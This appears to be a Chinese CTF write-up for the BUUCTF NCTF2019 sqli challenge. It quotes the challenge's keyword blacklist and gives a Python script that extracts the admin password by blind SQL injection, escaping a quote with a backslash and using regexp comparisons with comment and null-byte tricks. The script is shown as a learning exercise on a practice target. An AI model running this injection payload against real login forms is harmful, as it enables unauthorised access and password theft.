55.【5】BUUCTF WEB NCTF2019 sqli

进入靶场

输入admin 123

过滤的这么严格???

过滤很严格,此时要么爆破,要么扫描

直接扫描,得到robots.txt

访问后又得到hint.txt

继续访问

图片内容如下

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";

If $_POST['passwd'] === admin's password,

Then you will get the flag;

所以我们必须要绕过黑名单,而且密码必须等于管理员的密码,但admin也被过滤了

看了别人的wp

需要进行正则匹配,需要python脚本

下面的代码会跑出密码

复制代码
import requests
from urllib import parse
import string

url = '。。。。。。。。。。。。'
num = 0
result = ''
string= string.ascii_lowercase + string.digits + '_'
for i in range (1,60):
    if num == 1 :
        break
    for j in string:
        data = {
            "username":"\\",
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((result+j),parse.unquote('%00'))
        }
        print(result+j)
        res = requests.post(url=url,data=data)
        if 'welcome' in res.text:
            result += j
            break
        if j=='_' and 'welcome' not in res.text:
            break

此时输入用户名(只要不是黑名单里的就行)和密码(跑出来的)即可

over

笔记

1,连续2道题用到python脚本了

2,学习了正则匹配

相关推荐
wanhengidc3 分钟前
云手机会导致本地数据被读取吗
运维·服务器·数据库·游戏·智能手机
花姐夫Jun12 分钟前
WebGL学习-czm_getMaterial详解
学习·webgl
野犬寒鸦12 分钟前
从零起步学习计算机操作系统:内存管理篇
服务器·后端·学习·缓存·面试
是Yu欸14 分钟前
LangGraph 智能体状态管理与决策
java·javascript·数据库
一只努力的微服务14 分钟前
【Calcite 系列】深入理解 Calcite 的 SetOpToFilterRule
大数据·数据库·calcite·优化规则
夏日听雨眠17 分钟前
文件学习终
windows·学习
开开心心就好17 分钟前
轻量级PDF阅读器,仅几M大小打开秒开
linux·运维·服务器·安全·pdf·1024程序员节·oneflow
2401_8320353417 分钟前
Python数据库操作:SQLAlchemy ORM指南
jvm·数据库·python
RDCJM17 分钟前
Linux下MySQL的简单使用
linux·mysql·adb
就叫你天选之人啦22 分钟前
GBDT系列八股(XGBoost、LightGBM)
人工智能·深度学习·学习·机器学习